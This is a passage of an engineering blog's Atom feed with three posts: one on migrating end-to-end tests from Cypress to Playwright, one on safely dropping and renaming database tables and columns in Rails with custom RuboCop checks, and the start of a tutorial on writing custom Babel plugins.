Playwright gave us. If welook at a more practical example, our authentication flows through Cypress, andPlaywright gives a much better idea of the time saved. The authentication flow,which consistently took around <strong>2 minutes</strong> in Cypress, is completed in under<strong>20 seconds</strong> using Playwright.</p><p>Playwright's out-of-the-box support for parallelism and sharding can havemultiplicative effect in time savings. If we provide a process-based parallelismof 4 and shard the tests in 4 machines, then 16 tests are run concurrently,which reduces the execution time dramatically.</p><p>Implementing these additional configurations reduced the total test duration forone of our products from <strong>2 hours and 27 minutes</strong> to just <strong>16 minutes</strong>. This<strong>89.12%</strong> of time saving, directly translating to CI cost savings.</p><h3>Memory issues</h3><p>Cypress follows a split architecture. This means that Cypress executes the testswith a NodeJS process, which orchestrates the tests in the browser where thetests are executed. This also means that the browser execution environmentlimits the memory available for tests. Due to this, we have faced crashes inbetween tests multiple times. At one point, the crashes became so frequent thatwe had to invest a lot of time and energy into finding a solution because notest executions were running to completion. We have written a detailed blog onthis topic, which can be found<a href="https://www.bigbinary.com/blog/how-we-fixed-the-cypress-out-of-memory-error-in-chromium-browsers">here</a>.</p><p>Playwright fixes these issues because it handles the test execution in NodeJSservice and communicates with the browsers using<a href="https://chromedevtools.github.io/devtools-protocol/">CDP sessions</a>. This meansthat the memory management can be done on the NodeJS application, while thebrowser only has to worry about handling the actual web application we'retesting.</p><h3>Architecture prone to flakiness</h3><p>Many of Cypress's features are closely tied to its architecture. For example,one of the popular features in Cypress is its<a href="https://docs.cypress.io/guides/core-concepts/retry-ability">retry mechanism</a>and<a href="https://docs.cypress.io/guides/core-concepts/introduction-to-cypress#Chains-of-Commands">chaining</a>.However, these features do not always go hand-in-hand.</p><p>Let's consider this snippet of Cypress code.</p><pre><code class="language-js">cy.get(&quot;.inactive-field&quot;).click().type(&quot;Oliver Smith&quot;);</code></pre><p>While this code looks syntactically correct, it will make the test flaky. Thisis because, in Cypress, only queries are retried, not commands. In the exampleabove, consider that the class name of the field is updated to <code>active-field</code>when we click on it. This means that the <code>cy.get</code> query locates the field andthe <code>click</code> command work fine, but the chain fails at the <code>type</code> command. Thisis because an element with the class name <code>.inactive-field</code> no longer exists inthe DOM tree.</p><p>With the Cypress retry mechanisms, one would think that the whole chain would beretried from fetching the element. However, the chain was completed successfullyuntil the <code>click</code> action. So, only the <code>type</code> action will be retried and willcause the whole chain to fail. To avoid this issue, we must rewrite the testsafter splitting the chain.</p><pre><code class="language-js">cy.get(&quot;.inactive-field&quot;).click();cy.get(&quot;.inactive-field&quot;).type(&quot;Oliver Smith&quot;);</code></pre><p>While this works without issues, the syntactical sugar that Cypress provides bychaining the commands is no longer usable. Now, let's observe the Playwrightcode for the same.</p><pre><code class="language-ts">await page.locator(&quot;.inactive-field&quot;).click();await page.locator(&quot;.inactive-field&quot;).type(&quot;Oliver Smith&quot;);</code></pre><p>It looks pretty similar. This is because Playwright is designed to reduceflakiness as much as possible. To achieve that goal, it prevents the user fromimplementing anti-patterns that can lead to flaky results.</p><h3>Misleading simplicity</h3><p>Cypress is well known for its simplicity and natural syntax, which even the mostnon-technical person can learn. The code samples in the official documentation(which is still one of the best documentation for any framework) make it seemlike a walk in the park. But you soon realize that the examples are for verystraightforward application scenarios that we seldom encounter when working onlarge projects. When you start automating complex scenarios, things soon getcomplicated.</p><p>While performing simple tasks such as clicking on a button or asserting a textis extremely simple, doing something more moderately complex, such as storingthe text contents of a button in a variable, becomes highly complex. This isbecause Cypress architecture works by enqueuing the asynchronous commands. Thismeans that there are no return values for the commands, and the only way toretrieve values from Cypress commands is through a combination of closures andaliases. Let's consider a scenario where we have to verify that the sum of therandomly generated numbers on the screen is the same as the value shown on thepage.</p><p>&lt;div&gt;&lt;br/&gt;&lt;figure style=&quot;display:flex;flex-direction:column;align-items:center;gap:0.5rem;&quot;&gt;&lt;img width=&quot;666&quot; alt=&quot;Sample scenarios of the sum application&quot; src=&quot;/blog_images/2024/why-we-switched-from-cypress-to-playwright/sample-application-that-adds-two-numbers.png&quot;&gt;&lt;figcaption style=&quot;font-size:small;&quot;&gt;A sample application that adds two random numbers&lt;/figcaption&gt;&lt;/figure&gt;&lt;br/&gt;&lt;/div&gt;</p><p>Let's see the difference in code when automating this scenario in Cypress andPlaywright.</p><pre><code class="language-js">// Cypress// Considering all elements have proper data-cy labelscy.get('[data-cy=&quot;generate-new-numbers-button&quot;]').click();cy.get('[data-cy=&quot;first-number&quot;]').as(&quot;firstNumber&quot;);cy.get('[data-cy=&quot;second-number&quot;]').as(&quot;secondNumber&quot;);cy.get('[data-cy=&quot;sum&quot;]').as(&quot;sum&quot;);cy.get(&quot;@firstNumber&quot;).invoke(&quot;text&quot;).then(parseInt).as(&quot;num1&quot;);cy.get(&quot;@secondNumber&quot;).invoke(&quot;text&quot;).then(parseInt).as(&quot;num2&quot;);cy.get(&quot;@sum&quot;).invoke(&quot;text&quot;).then(parseInt).as(&quot;displayedSum&quot;);// Use the aliases to perform the assertioncy.get(&quot;@num1&quot;).then(num1 =&gt; {  cy.get(&quot;@num2&quot;).then(num2 =&gt; {    cy.get(&quot;@displayedSum&quot;).then(displayedSum =&gt; {      const expectedSum = num1 + num2;      expect(displayedSum).to.equal(expectedSum);    });  });});</code></pre><p>We can see how complicated the code becomes when the scenario is just slightlycomplex. Meanwhile, the Playwright code will look like this.</p><pre><code class="language-ts">// Playwright// Considering all elements have proper data-cy labels and the default test-id-attribute is data-cyawait page.getByTestId(&quot;generate-new-numbers-button&quot;).click();const firstNumber = await page.getByTestId(&quot;first-number&quot;).innerText();const secondNumber = await page.getByTestId(&quot;second-number&quot;).innerText();const sum = await page.getByTestId(&quot;sum&quot;).innerText();expect(parseInt(firstNumber) + parseInt(secondNumber)).toBe(parseInt(sum));</code></pre><p>We can see from the code above, how easily we can implement the same logic inPlaywright.</p><h3>Cost of maintenance for Cypress vs. Playwright tests</h3><p>Cypress is an easy-to-learn framework. This simplicity is due to the abstractionof the most commonly used functionalities into Cypress commands. However, thisis a double-edged sword. The abstraction of logic into commands means thatcustomization is complicated in Cypress.</p><p>One of Cypress's significant drawbacks is its reliance on HTML tags andattributes to locate an element. While this makes sense from a programmingstandpoint, the end user is concerned about the roles of the page element(button, heading, etc.) and not how they have been implemented. For the samereason, the text, appearance and functionality of the application are bound toremain consistent throughout the various iterations, while the attributesthemselves are prone to changes.</p><p>This ultimately means the developers must keep fixing/rewriting the Cypresstests for minor UI updates. Cypress is also the slowest of all the e2e testingframeworks in JavaScript, resulting in longer CI runtimes and costs. Thesecombined make the cost of maintaining Cypress tests exceptionally high.</p><p>Besides this, Cypress has many features locked behind its Cypress Cloudplatform, which is very <a href="https://www.cypress.io/pricing">expensive</a>, consideringthe fact that all it does is to collect the test results. This is an additionalcost to bear over the already expensive costs of maintaining the Cypress tests.Given these factors, the cost of preserving Cypress tests can quickly outweighthe benefits of its simplicity and ease of use.</p><p>Playwright solves all of these issues. It has many built-in reporters and anexcellent API for creating custom reporters, so many third-party reporters areavailable. We can even build our custom reporter to save even more costs.</p><h3>Browser support and support for mobile viewport</h3><p>Since Cypress tests run directly on the browsers, only a few are supported.Until recently, it did not even support <a href="https://webkit.org/">WebKit</a> browsers,even though <a href="https://www.apple.com/in/safari/">Safari</a> has a considerable marketshare. Even at the time of writing this article, Cypress's WebKit support isstill in beta. Even if it supports the required browsers, there is still theconstraint that only one browser can be used during an execution.</p><p>Playwright fixes all these issues with minimal effort from our end. It hascomplete support for WebKit browsers and conveniently provides a set of presetsfor the browsers, user agents and viewport of the most popular devices in themarket, including mobile devices. Furthermore, Playwright allows us to executethe same test in different browsers concurrently with the help of projects.These configurations give us the confidence that a passing Playwright test meansthe features will work fine for all users.</p><h3>Support for multiple tabs and browsers</h3><p>While most of the features of a web application can be tested within a singletab, there are a few cases where multiple tabs or browsers become necessary. Onesuch scenario we encountered while writing tests for<a href="https://neeto.com/neetochat">NeetoChat</a>, a real-time chat application. To testNeetoChat we need to open two screens - one for the sender and the other for thereceiver.</p><p>Cypress lacks the support for multiple tabs, so the only way to test thesescenarios was to do this long and complicated process:</p><ol><li>Login as the sender</li><li>Send a message</li><li>Logout</li><li>Login as the receiver</li><li>Verify the message</li><li>Send a reply</li><li>Logout</li><li>Login as the sender</li><li>Verify the response.</li></ol><p>We can see the tedious steps that we need to perform for a relatively simplescenario. This becomes even more tedious if we configure sessions in Cypressbecause we need to invalidate them each time we log out so that we can log in asa different user.</p><p>On the other hand, Playwright provides support for multiple tabs and multiplebrowsers. This means we can log in as the sender from one tab and the receiverfrom another, making the scenario more straightforward and effective.Additionally, we could identify whether the messages were being delivered inreal time because there is no delay in the user switching between the messageposting and verification processes. Playwright also supports browser contexts,which isolate the events between two browser instances, aiding in test isolationduring parallel test execution.</p><h3>Lack of necessary tools</h3><p>Cypress depends on plugins for many necessary tools. These are features we havecome to expect from any modern testing framework. Let's examine a few such toolsand how Playwright handles them natively.</p><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt;Feature&lt;/td&gt;&lt;td&gt;Cypress plugin&lt;/td&gt;&lt;td&gt;Playwright implementation&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Waiting until a particular event completes on a page&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;https://github.com/NoriSte/cypress-wait-until&quot;&gt;cypress-wait-until&lt;/a&gt;&lt;/td&gt;&lt;td&gt;Playwright offers a variety of APIs which pause the tests until a triggerevent like&lt;a href=&quot;https://playwright.dev/docs/api/class-page#page-wait-for-url&quot;&gt;waitForURL&lt;/a&gt;,&lt;a href=&quot;https://playwright.dev/docs/api/class-page#page-wait-for-request&quot;&gt;waitForRequest&lt;/a&gt;,&lt;a href=&quot;https://playwright.dev/docs/api/class-locator#locator-wait-for&quot;&gt;waitFor&lt;/a&gt;etc.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Adding steps blocks in tests to logically group commands&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;https://github.com/filiphric/cypress-plugin-steps&quot;&gt;cypress-plugin-steps&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;https://playwright.dev/docs/api/class-test#test-step&quot;&gt;test.step&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Ability to interact with iframes&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;https://gitlab.com/kgroat/cypress-iframe&quot;&gt;cypress-iframe&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;https://playwright.dev/docs/api/class-framelocator&quot;&gt;frameLocator&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Filtering tests based on the titles or tags&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;https://github.com/cypress-io/cypress/tree/develop/npm/grep&quot;&gt;@cypress/grep&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;https://playwright.dev/docs/api/class-fullproject#full-project-grep&quot;&gt;Playwright grep&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><p>We must consider that Playwright includes all these tools out of the box whilestill being more performant than Cypress. As we add such plugins in Cypress, thepackage size also increases.</p><h3>Random errors during tests due to Cypress's iFrame Execution Model</h3><p>As discussed already, Cypress tests are executed inside a browser. They work byrunning Cypress as the main page and running the application which is beingtested as an iframe within the page. This can lead to a lot of unexpected errorsduring the test execution.</p><p>One of the most commonly encountered errors is related to security issues withcookies. When the tested application uses cookies, it might throw random errorsduring the Cypress execution depending on the configuration. This is because the<a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie#samesitesamesite-value">SameSite</a>configuration of the cookies might block it from being shared with the parentCypress application. This can lead to them not be sent during API requestscausing authentication failures and also cause difficulties with<a href="https://docs.cypress.io/api/commands/session">session</a> configuration.</p><h2>Additional benefits of using Playwright</h2><h3>More resistance to test failures due to minor text changes</h3><p>At BigBinary, we follow a behavioral testing pattern where we verify thefeatures, and not minor details like texts and styles. We made this decision toensure that the tests don't fail due to minor changes in the application. Whilethis is our go-to testing style, there are still some cases where we cannotavoid testing the texts on the page (for example, the error message shown whiletesting negative test cases). This required our tests to be frequently updatedwhile working with Cypress whenever a minor text change was made in theapplication.</p><p>When we switched to Playwright, we got excited about how much we could customizeit according to our needs. This customization is available because, under thehood, it's still a Node.js application. We already use<a href="https://www.i18next.com/">i18next</a> to serve the texts on our application. Wefigured that the tests should use the same translation file. The translationkeys remain consistent even when the texts are updated.</p><p>This minor change brought a huge difference in our test stability. The averagenumber of tests we had to update each week decreased from <strong>22</strong> to <strong>2</strong>. Thatis a lot of time saved, which we could effectively use to expand our testcoverage instead of wasting it fixing the existing suite.</p><h3>Ability to build our own in-house reporter</h3><p>When working with Cypress, we had to switch between many reporting tools,including Cypress Cloud, Currents.dev, and many other third-party tools. Whilethey all had benefits and drawbacks, we couldn't find one that addressed all ourneeds. This is where the excellent reporter APIs offered by Playwright allowedus to write our own Playwright reporter -<a href="https://www.neeto.com/neetoplaydash">NeetoPlaydash</a>.</p><p>We currently use NeetoPlaydash for all our reporting needs and can customize itaccording to our requirements. Most importantly, we reduced the monthlyreporting tool costs by <strong>77% ($405 to $90 per month)</strong>. We also didn't have toworry about exhausting the monthly test limits of third-party reporters,allowing us to run our tests more frequently, thus improving the stability ofour applications.</p><h3>More coverage on tests relating to third-party integrations</h3><p>In Neeto products, we have support for third-party integrations. For example, in<a href="https://www.neeto.com/neetocal">NeetoCal</a> we can have integrations for<a href="https://calendar.google.com/">Google Calendar</a>, <a href="https://zoom.us">Zoom</a>,<a href="https://teams.microsoft.com/">Microsoft teams</a> and a lot more third-partyapplications. Most of these applications have bot detection algorithmsimplemented in place to ensure that their platforms are not misused by badactors. This also meant that we had to consider the integration features to beunautomatable when tested using Cypress.</p><p>Playwright does things differently. Since it's a Node.js application, itsupports all the packages available for the platform. Because of its widesupport, the community has developed a lot of tools for Playwright. We tookadvantage of these tools and plugins and were able to bypass the bot-detectionalgorithms that prevented us from testing the third-party integrations. Thisallowed us to test these integrations in our products effectively and ensurethat the application ran smoothly with the help of automation tests.</p><h2>Conclusion</h2><p>We strongly believe that migrating to Playwright is one of the best decisions wehave ever made. We did not know what we were missing out on until we decided totake the leap and migrate. We got better performance, less flakiness and morecoverage from our test suites. The cost and time saved helped us to effectivelydivert resources to things that actually matter and let the tests do testinginstead of using additional resources to maintain the tests themselves.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Dropping tables, dropping columns and renaming columns in a safe way in Ruby on Rails]]></title>
       <author><name>Abhay V Ashokan</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-deleting-tables-columns-using-rubocop"/>
      <updated>2024-09-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-deleting-tables-columns-using-rubocop</id>
      <content type="html"><![CDATA[<p>We are building <a href="https://neeto.com/cal">NeetoCal</a>, which is a Calendlyalternative. Recently, we deployed the latest code to production. The codechange involved deleting a table. To our horror, during the deployment, wenoticed that some users experienced errors with status code 500 for a fewminutes. This happened because the migration to drop the tables ran quickly andthe tables got deleted. However, the old code was still referring to thosetables.</p><p>This kind of issue is pretty common with schema migrations, especially whenyou're dropping tables or columns. If the migration finishes before the codedeployment catches up, you end up with the old process still trying to access tablesor columns that no longer exist. This mismatch can cause temporary errors, likethe 500s we saw.</p><p>The safest bet might be to turn on the maintenance mode every time we run aschema migration. At NeetoCal, we deploy changes to production every day. Weonly want to schedule downtime when it's absolutely necessary. So this optionwas ruled out. We also heard that some companies manually restart their dynosduring schema migrations to roll out the new code changes. However, this did notsit well with us either.</p><p>Most of the people we talked to solved this problem by having two stepdeployments.</p><p>Deployment 1: Deploy the code that does not use the table.</p><p>Deployment 2: Drop the table.</p><p>This can work, and it does work. However, we were worried about a potential edgecase. Let's say that a piece of code is still referring the table. After thedeployment 1 this code is working and we don't see anything going wrong. Itcould be due to recent merges slipping in unnoticed, as we ship very fast.</p><p>However, when do we deployment 2 the migrations will run first, dropping thetable, followed by the deployment of the code. When new code boots up, werealize that one part of the app is not working.</p><p>Now we are in trouble. We are in trouble because the table is gone. If we havetaken the database backup, then we can restore the backup but that causes allkinds of issues because we might not catch this bug for sometime. In themeantime other tables are getting new data. So restoring backup is a messysolution.</p><p>The only solution is to fix the code. Now we need to fix the code in a rush.That's what we want to avoid. Before we look at our solution, let's look at whatwe found when we looked at other solutions.</p><h2>strong_migrations didn't protect dropping of table</h2><p>At NeetoCal, we are using the<a href="https://github.com/ankane/strong_migrations">strong_migrations</a> gem to catchunsafe migrations. The gem catches unsafe migration like<a href="https://github.com/ankane/strong_migrations?tab=readme-ov-file#removing-a-column">removing a column</a>but it doesn't capture unsafe operations like dropping a table.</p><p>Upon some digging, we found<a href="https://github.com/ankane/strong_migrations/issues/49#issuecomment-419107996">this issue</a>where the author of the gem expressed unwillingness to add <code>drop_table</code> as anunsafe operation.</p><p>No worries. We can add dropping of a table as an unsafe operation in<code>strong_migration</code> ourselves. Here's how it can be done.</p><pre><code class="language-rb"># config/initializers/strong_migrations.rbStrongMigrations.add_check do |method, args|  if method == :drop_table    stop! &quot;Dropping tables via migrations is discouraged.&quot;  endend</code></pre><p>To drop the table, we can use the <code>safety_ensured</code> block provided by the<code>strong_migrations</code> gem to mark the step as safe.</p><pre><code class="language-rb"># db/migrate/20240809131941_drop_users.rbclass DropUsers &lt; ActiveRecord::Migration[8.0]  def change    safety_assured { drop_table :users }  endend</code></pre><p>While this gets the work done, it doesn't solve the problem of &quot;some code stillreferring the table&quot; problem. Hence, this solution was a &quot;no go&quot; from our side.</p><h2>Sam wants to delay dropping of tables and columns</h2><p><a href="https://x.com/samsaffron">Sam Saffron</a> had run into similar problems. He cameup with a solution and he wrote about it in<a href="https://samsaffron.com/archive/2018/03/22/managing-db-schema-changes-without-downtime">this blog</a>.</p><p>His solution was not to drop the tables and columns immediately. Instead use&quot;defer drops&quot; to drop column or tables at least 30 minutes after the particularmigration was run.</p><p>He introduced<a href="https://github.com/discourse/discourse/blob/6a3c8fe69c16ad7360046f145db6689c18e91005/lib/migration/column_dropper.rb">ColumnDropper</a>and<a href="https://github.com/discourse/discourse/commit/6a3c8fe69c16ad7360046f145db6689c18e91005#diff-d4fcc7d7501c6256f67a8a2ea0f1d3ef27136b86213809563d9b583592774c5d">TableDropper</a>to get this work done.</p><p>We felt that this solution adds an extra layer of complexity and we rejectedthis solution. In fact later we found that they ran into some issues with &quot;deferdrops&quot; as discussed <a href="https://github.com/discourse/discourse/pull/6406">here</a>.</p><h2>Dropping tables and columns should be allowed if it follows a pattern</h2><p>After some internal discussion, we also decided to follow a three-stepdeployment process to ensure zero downtime and easy roll back without any dataloss.</p><p>In &quot;Deployment 1&quot;, we remove all the code that refers to the table we want todrop. This ensures that nothing in the application depends on that tableanymore.</p><p>In &quot;Deployment 2&quot;, the table will be renamed. For example, table<code>users</code> will berenamed to<code>users-deprecated-on-2024-08-09</code>. This step helps catch any danglingcode that is still referring to the old table. If any part of the app still triesto use the table, the errors will show up, and we can fix the problem in one of thetwo ways. We can revert the migration and the code. Or we can change the code.We have a choice. If we delete the table, then we don't have a choice.</p><p>Finally, in &quot;Deployment 3&quot;, once were confident that the table is no longerin use, we can drop it completely. Since the table follows a specific namingpattern, it's clear that it's ready to be safely deleted.</p><p>We can follow a similar approach when dropping columns. To add an extra layer ofsafety, we mark the column that we need to drop as ignored using ActiveRecord's<a href="https://api.rubyonrails.org/classes/ActiveRecord/ModelSchema/ClassMethods.html#method-i-ignored_columns-3D">ignored_columns</a>method. For example, if we need to drop the <code>display_name</code> column from the<code>users</code> table, start by marking it as ignored:</p><pre><code class="language-rb">class User &lt; ActiveRecord::Base  self.ignored_columns += [:display_name]end</code></pre><p>By doing this, even if the <code>display_name</code> column still exists in some lingeringcode, our model wont recognize it. This helps avoid any accidental referencesto the column in your code. Once youve successfully dropped the column, you canremove this line from your model.</p><p>If our model won't recognize it, then why do we need RuboCop for dropping acolumn. Once again, the answer is to avoid an edge case. Let's say that we areusing executing SQL directly. And this SQL is referring the column<code>display_name</code>. Since a direct SQL is being used, adding this column to<code>ignored_columns</code> will have no impact. Once this column is delete,d then only wewill get to know about the error.</p><p>By renaming the column, we maintain the data but at the same time all thelingering code would start failing.</p><h2>RuboCop rules to ensure the policy is followed</h2><p>Now the task was to build a custom cop to enforce the policy.</p><pre><code class="language-rb"># baddrop_table :users# baddrop_table :users do |t|  t.string :email, null: false  t.string :first_name, null: falseend# gooddrop_table :users_deprecated_on_2024_08_09# gooddrop_table :users_deprecated_on_2024_08_09 do |t|  t.string :email, null: false  t.string :first_name, null: falseend</code></pre><p>We need to handle removal of column similarly.</p><pre><code class="language-rb"># badremove_column :users, :email# badchange_table :users do |t|  t.remove :emailend# goodremove_column :users, :email_deprecated_on_2024_08_09# gooddrop_table :users do |t|  t.remove :email_deprecated_on_2024_08_09end</code></pre><p>We added these two cops to our<a href="https://github.com/bigbinary/rubocop-neeto">rubocop-neeto</a> repo.</p><h2>Safely renaming database columns</h2><p>Renaming a column brings the same challenges as we have discussed in theprevious sections. Renaming a column directly will cause temporary downtimesince the new code references the new column name while the old code refers tothe old column name. To avoid downtime, we need to deliberately carry out thisoperation in multiple deployments.</p><p>Here are the steps to rename the <code>username</code> column to <code>display_name</code> in the<code>users</code> table:</p><p><strong>Deployment 1</strong></p><ol><li><strong>Create the new column</strong>: Start by adding the new <code>display_name</code> column tothe table.</li></ol><pre><code class="language-rb">class AddDisplayNameToUsers &lt; ActiveRecord::Migration[8.0]  def change    add_column :users, :display_name, :string  endend</code></pre><ol start="2"><li><strong>Write to both columns</strong>: Update your app so it writes to both the old andnew columns. <code>ActiveRecord</code> callbacks can help with this:</li></ol><pre><code class="language-rb">class User &lt; ApplicationRecord  before_save do    self.display_name = username if will_save_change_to_username? }  endend</code></pre><ol start="3"><li><strong>Backfill data from the old column to the new column</strong>: Next, backfill thedata from the <code>username</code> column to the <code>display_name</code> column:</li></ol><pre><code class="language-rb">User.update_all('display_name = username')</code></pre><p><strong>Deployment 2</strong></p><ol start="4"><li><strong>Move reads from the old column to the new column</strong>: Update application toread from the <code>display_name</code> column instead of the old <code>username</code> column, andthen remove the double writes to both columns.</li></ol><p><strong>Deployment 3</strong></p><ol start="5"><li><strong>Drop the old column</strong>: Finally, drop the old column once everything is inplace.</li></ol><pre><code class="language-rb">class DropUsernameFromUsers &lt; ActiveRecord::Migration[8.0]  def change    remove_column :users, :username  endend</code></pre><p>This approach might seem tedious, but it's essential for achieving zero downtimeduring the migration and avoiding any edge cases. We can apply the same stepswhen renaming tables as well. For more details on that process, check out<a href="https://github.com/ankane/strong_migrations?tab=readme-ov-file#renaming-a-table">the steps mentioned by the strong_migrations gem</a>.</p><p>Running schema migrations can be scary, especially when they involve droppingtables and columns. But with the right safeguards in place, we can confidentlydeploy updates without worrying about any surprises.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Introduction to custom Babel plugins]]></title>
       <author><name>Joseph Mathew</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-build-your-own-babel-plugins"/>
      <updated>2024-09-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-build-your-own-babel-plugins</id>
      <content type="html"><![CDATA[<p><a href="https://babeljs.io/docs/">Babel</a> is a tool that allows us to write modernJavaScript while ensuring it works across older browsers. Instead of generatingbinary code like traditional compilers, Babel performs source-to-sourcetransformations.</p><p>For example, with modern JavaScript, we might use arrow functions like this:</p><pre><code class="language-js">const add = (a, b) =&gt; a + b;</code></pre><p>This code works in modern browsers but not in older ones, like InternetExplorer, which does not support arrow functions. Without Babel, we would needto use older syntax to ensure compatibility, which limits our use of modernfeatures. Babel solves this problem by transforming the modern code into anolder syntax that more browsers can handle. For example, Babel converts thearrow function code above into the standard function syntax shown below, whichis compatible with all browsers.</p><pre><code class="language-js">var add = function add(a, b) {  return a + b;};</code></pre><p>With Babel, we can write modern JavaScript code without worrying about browsercompatibility. Babel uses several presets and plugins to achieve this.</p><h2>Plugins and Presets</h2><p><strong>Plugins</strong> are individual components that handle specific tasks in JavaScriptcode. For example, there are plugins for converting Arrow Functions to ES5Functions, JSX to React functional calls and so on.</p><p>There are two main types of plugins:</p><ul><li><p><strong>Syntax Plugins</strong>: These plugins help Babel understand new syntax that itdoesnt recognize otherwise. For example, Babel doesnt understand JSX syntaxby default, so we need a plugin to enable this.<a href="https://babeljs.io/docs/babel-plugin-syntax-jsx">@babel/plugin-syntax-jsx</a> isa syntax plugin that allows Babel to recognize and parse JSX syntax.</p></li><li><p><strong>Transformation Plugins</strong>: This type of plugins help Babel convert codewritten in modern syntax into format more widely supported by differentbrowsers. For instance,<a href="https://babeljs.io/docs/babel-plugin-transform-react-jsx">@babel/plugin-transform-react-jsx</a>is a transformation plugin that converts JSX into React functional calls.</p></li></ul><p><strong>Presets</strong> make things easier by bundling related plugins together. Instead ofsetting up each plugin separately, we can use a preset that includes all thenecessary plugins. For instance,<a href="https://babeljs.io/docs/babel-preset-react">@babel/preset-react</a> includes both<code>@babel/plugin-syntax-jsx</code> and <code>@babel/plugin-transform-react-jsx</code>, handlingboth JSX recognition and transformation in one go.</p><h2>Plugin and Preset Order in Babel Configuration</h2><p>Babel processes plugins in the order they are listed in the Babel configurationfile. This is important because the output of one plugin can affect the input ofanother. For example, if we want to convert JSX to React functional calls, weneed to ensure that the JSX syntax is recognized first. So, we should list thesyntax plugin before the transformation plugin in the configuration file.</p><pre><code class="language-json">{  &quot;plugins&quot;: [&quot;@babel/plugin-syntax-jsx&quot;, &quot;@babel/plugin-transform-react-jsx&quot;]}</code></pre><p>Babel process presets in reverse order. This means that the last preset listedwill be the first to be processed.</p><pre><code class="language-json">{  &quot;presets&quot;: [&quot;@babel/preset-env&quot;, &quot;@babel/preset-react&quot;]}</code></pre><p>For example, let's look at the configuration mentioned above. In this case<code>@babel/preset-react</code> preset will be applied first, followed by<code>@babel/preset-env</code>, ensuring that React-specific transformations are handledbefore general environment compatibility transformations.</p><h2>Custom Babel Plugin</h2><p>While Babel offers a wide range of plugins and presets, it's true potential liesin the ability to create custom plugins tailored to our project's specificneeds. In the final section of this blog, we will explore a use case weencountered at <a href="https://www.neeto.com/">Neeto</a> and how we solved it with acustom Babel plugin. For now, let's focus on creating a simple plugin. Before webegin, it's important to understand a key concept called an AST (Abstract SyntaxTree).</p><h3>Abstract Syntax Tree (AST)</h3><p>An AST is a tree representation of the structure of a program. It breaks downthe code into its constituent parts and represents them as nodes in a tree. Eachnode in the tree represents a different part of the code, such as a variabledeclaration, a function call, or a loop. Babel uses ASTs to analyze andtransform JavaScript code. For example, consider the following code:</p><pre><code class="language-js">const sum = (x, y) =&gt; x + y;</code></pre><p>This is how its AST looks:</p><p><img src="/blog_images/2024/how-to-build-your-own-babel-plugins/ast_demo.gif" alt="AST Demo"></p><p>In this example, the root node is the <code>File</code> node, which represents the entirecode file. Within it, there are several nested nodes like, <code>VariableDeclarator</code>,<code>ArrowFunctionExpression</code> and so on, each dedicated to different parts of thecode. As shown in the animation, hovering over each node highlights thecorresponding code segment on the left-hand side. To explore and interact withboth the code and its AST, the <a href="https://astexplorer.net/">AST Explorer</a> tool canbe used.</p><h3>Babel transpile stages</h3><p>Now that we have a basic understanding of ASTs, let's see at how Babel works. Ithas three main stages:</p><ul><li><strong>Parse Stage</strong>: In this stage, the code that is passed to Babel as input isconverted into an AST. This is done using the<a href="https://babeljs.io/docs/babel-parser">@babel/parser</a> package.</li><li><strong>Transform Stage</strong>: This is the stage where Babel traverses and modifies theAST using <a href="https://babeljs.io/docs/babel-traverse">@babel/traverse</a> package.This is where plugins come into play to apply specific transformations. Itsimportant to note that this is the only step we can influence. In the nextsection, we'll see how to create a custom Babel plugin.</li><li><strong>Generate Stage</strong>: Once the AST has been modified, it needs to be convertedback into code. This is done using<a href="https://babeljs.io/docs/babel-generator">@babel/generator</a> package.</li></ul><h3>Creating a Babel Plugin</h3><p>As mentioned in the previous section, Babel plugins are used to applytransformations to the AST, and this is the only step we can influence. So,lets see how to create a simple Babel plugin. We will create a plugin thatconverts all <code>==</code> operators in the code to <code>===</code>. This is a commontransformation that developers often use to ensure strict equality checks intheir code.</p><p>First, let's set up the project structure for our plugin.</p><ul><li><p><strong>Step 1</strong>: Create a new directory and initialize a new npm package for theplugin. Let's prefix the package name with <code>babel-plugin-</code>. This namingconvention clearly indicates that the package is a Babel plugin, making iteasier for others to identify its purpose.</p><pre><code class="language-bash">mkdir babel-plugin-strict-equalitycd babel-plugin-strict-equalitynpm init -y</code></pre></li><li><p><strong>Step 2</strong>: Create a file named <code>index.js</code> in the root of the plugindirectory. This file will contain the logic for the plugin.</p><pre><code class="language-bash">touch index.js</code></pre></li></ul><p>Now that we have set up the project structure, let's start writing the plugincode.</p><p>To transform the code, we need to traverse the AST generated from the parsestage. We can do this by creating a <code>visitor</code> object that defines thetransformations to be applied to the AST. The visitor object contains methodsthat correspond to different types of nodes in the AST. When Babel encounters anode of a particular type, it calls the corresponding method in the <code>visitor</code>object to apply the transformation.</p><p>To understand this better, let's look at a code example that we want totransform:</p><pre><code class="language-js">a == b;</code></pre><p>We want to transform this code into:</p><pre><code class="language-js">a === b;</code></pre><p>First, let's examine the AST representation of the original code:</p><pre><code class="language-json">{  &quot;type&quot;: &quot;File&quot;,  &quot;program&quot;: {    &quot;type&quot;: &quot;Program&quot;,    &quot;body&quot;: [      {        &quot;type&quot;: &quot;ExpressionStatement&quot;,        &quot;expression&quot;: {          &quot;type&quot;: &quot;BinaryExpression&quot;,          &quot;left&quot;: {            &quot;type&quot;: &quot;Identifier&quot;,            &quot;name&quot;: &quot;a&quot;          },          &quot;operator&quot;: &quot;==&quot;,          &quot;right&quot;: {            &quot;type&quot;: 